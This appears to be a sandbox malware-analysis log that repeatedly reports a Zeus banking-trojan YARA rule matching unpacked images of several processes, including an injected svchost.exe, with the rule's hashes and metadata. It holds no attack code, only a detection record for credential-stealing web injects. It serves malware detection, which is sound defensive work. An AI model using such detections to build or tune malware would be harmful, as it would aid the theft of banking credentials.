Source: 0.3.UMwpXhA46R.exe.7031e8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.52.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.31.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2c70000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.27.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ea2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.15b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.47.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2b80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.UMwpXhA46R.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.28.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.46.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.23.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.30.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.UMwpXhA46R.exe.407000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.42.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.29f3c00.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.15.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.27a0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2cd1c00.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.55.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2672000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1040000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2af2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.42.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.24f2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.54.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2d80000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ca0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.UMwpXhA46R.exe.406400.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 9.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.a20000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.29.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.51.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.37.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 9.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.9c2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.25f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
